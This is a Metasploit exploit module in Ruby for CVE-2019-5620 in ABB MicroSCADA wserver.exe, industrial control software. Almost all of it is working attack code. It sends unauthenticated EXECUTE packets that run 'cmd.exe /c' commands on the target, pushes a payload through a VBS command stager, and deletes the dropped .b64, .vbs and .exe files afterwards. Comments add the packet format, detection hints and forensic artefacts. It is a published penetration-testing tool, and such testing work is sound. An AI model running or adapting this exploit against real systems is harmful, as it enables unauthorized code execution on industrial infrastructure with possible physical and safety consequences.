Path: blob/master/modules/exploits/windows/scada/abb_wserver_exec.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Exploit module for the unauthenticated EXECUTE operation exposed by the
# ABB MicroSCADA wserver.exe component (details in 'Description' below).
#
# Wire format used by every request in this module: a little-endian uint32
# holding the total packet length (the 4 length bytes included), then the
# NUL-terminated opcode "EXECUTE", then — for command execution only — the
# raw command text. Replies checked here are always exactly 6 bytes: a
# little-endian uint16 followed by a little-endian uint32 status code.
#
# Detection note: the opcode "EXECUTE\x00" and the "cmd.exe /c " prefix are
# both sent unencoded over plain TCP to RPORT (default 12221).
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::CmdStager

  # Module metadata. Beyond what the Tcp and CmdStager mixins register, the
  # only option added here is RPORT, defaulting to 12221.
  #
  # @param info [Hash] metadata merged via update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'ABB MicroSCADA wserver.exe Remote Code Execution',
        'Description' => %q{
          This module exploits a remote stack buffer overflow vulnerability in ABB MicroSCADA. The
          issue is due to the handling of unauthenticated EXECUTE operations on the wserver.exe
          component, which allows arbitrary commands. The component is disabled by default, but
          required when a project uses the SCIL function WORKSTATION_CALL.

          This module has been tested successfully on ABB MicroSCADA Pro SYS600 9.3 on
          Windows XP SP3 and Windows 7 SP1.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Brian Gorenc', # Original discovery
          'juan vazquez' # Metasploit module
        ],
        'References' => [
          [ 'CVE', '2019-5620' ],
          [ 'OSVDB', '100324'],
          [ 'ZDI', '13-270' ],
          [ 'URL', 'https://library.e.abb.com/public/41ccfa8ccd0431e6c1257c1200395574/ABB_SoftwareVulnerabilityHandlingAdvisory_ABB-VU-PSAC-1MRS235805.pdf']
        ],
        'Platform' => 'win',
        'Arch' => ARCH_X86,
        'DefaultOptions' => {
          'WfsDelay' => 5
        },
        'Targets' => [
          [ 'ABB MicroSCADA Pro SYS600 9.3', {} ]
        ],
        'CmdStagerFlavor' => 'vbs',
        'DefaultTarget' => 0,
        'Privileged' => false,
        'DisclosureDate' => '2013-04-05',
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options([Opt::RPORT(12221)])
  end

  # Fingerprint the service without executing anything.
  #
  # Sends an EXECUTE packet that carries no command body. The target is
  # reported as Vulnerable only when the reply is exactly 6 bytes whose
  # uint16 LE header is 6 and whose uint32 LE status is 0xe10001 — an
  # error status is the expected answer to a command-less EXECUTE.
  #
  # @return [Exploit::CheckCode] Vulnerable on that exact reply, Safe otherwise
  def check
    # Send an EXECUTE packet without command, a valid response
    # should include an error code, which is good enough to
    # fingerprint.
    op = "EXECUTE\x00"
    pkt_length = [4 + op.length].pack("V") # 4 because of the packet length
    pkt = pkt_length
    pkt << op

    # NOTE(review): connect/disconnect are not wrapped in ensure, so an
    # exception from put/get_once leaves the session open — confirm whether
    # the Tcp mixin tears it down on its own.
    connect
    sock.put(pkt)
    res = sock.get_once
    disconnect

    if res and res.length == 6 and res[0, 2].unpack("v")[0] == 6 and res[2, 4].unpack("V")[0] == 0xe10001
      return Exploit::CheckCode::Vulnerable
    end

    return Exploit::CheckCode::Safe
  end

  # Entry point: delivers the payload through the VBS command stager.
  #
  # linemax is capped at 750 because, per the original author's note, longer
  # lines trigger the overflow themselves. nodelete is set so the stager
  # leaves its dropped files in place; execute_cmdstager_end removes them.
  def exploit
    # More than 750 will trigger overflow...
    # Cleaning is done by the exploit on execute_cmdstager_end
    execute_cmdstager({ :linemax => 750, :nodelete => true })
  end

  # CmdStager hook invoked once the stager has finished.
  #
  # Reads the temp directory and the generated file-name stems out of the
  # stager instance and deletes the three files it dropped — <encoded>.b64,
  # <decoder>.vbs and <decoded>.exe — through the same EXECUTE channel.
  # From a forensics standpoint these three names in the stager temp dir,
  # plus the "del" commands, are the on-host artefacts of a run.
  #
  # NOTE(review): the stems are pulled via instance_variable_get, i.e. from
  # CmdStager's private ivars — verify the names still match the mixin.
  #
  # @param opts [Hash] stager options; unused here
  def execute_cmdstager_end(opts)
    @var_tempdir = @stager_instance.instance_variable_get(:@tempdir)
    @var_decoded = @stager_instance.instance_variable_get(:@var_decoded)
    @var_encoded = @stager_instance.instance_variable_get(:@var_encoded)
    @var_decoder = @stager_instance.instance_variable_get(:@var_decoder)
    print_status("Trying to delete #{@var_tempdir}#{@var_encoded}.b64...")
    execute_command("del #{@var_tempdir}#{@var_encoded}.b64", {})
    print_status("Trying to delete #{@var_tempdir}#{@var_decoder}.vbs...")
    execute_command("del #{@var_tempdir}#{@var_decoder}.vbs", {})
    print_status("Trying to delete #{@var_tempdir}#{@var_decoded}.exe...")
    execute_command("del #{@var_tempdir}#{@var_decoded}.exe", {})
  end

  # Run a single command on the target via the EXECUTE operation.
  #
  # The command is wrapped as "cmd.exe /c <cmd>" and sent as
  # <uint32 LE total length><"EXECUTE\x00"><command>. Success is a 6-byte
  # reply whose uint16 LE header is 6 and whose uint32 LE status is 1;
  # any other reply (or none) aborts the module with
  # fail_with(Failure::UnexpectedReply, ...).
  #
  # @param cmd [String] command line to run on the target
  # @param opts [Hash] unused here; present for the CmdStager callback
  def execute_command(cmd, opts)
    op = "EXECUTE\x00"
    command = "cmd.exe /c #{cmd}"
    pkt_length = [4 + op.length + command.length].pack("V") # 4 because of the packet length

    pkt = pkt_length
    pkt << op
    pkt << command

    # NOTE(review): same connect/disconnect-without-ensure pattern as check.
    connect
    sock.put(pkt)
    res = sock.get_once
    disconnect

    unless res and res.length == 6 and res[0, 2].unpack("v")[0] == 6 and res[2, 4].unpack("V")[0] == 1
      fail_with(Failure::UnexpectedReply, "Unexpected reply while executing the cmdstager")
    end
  end
end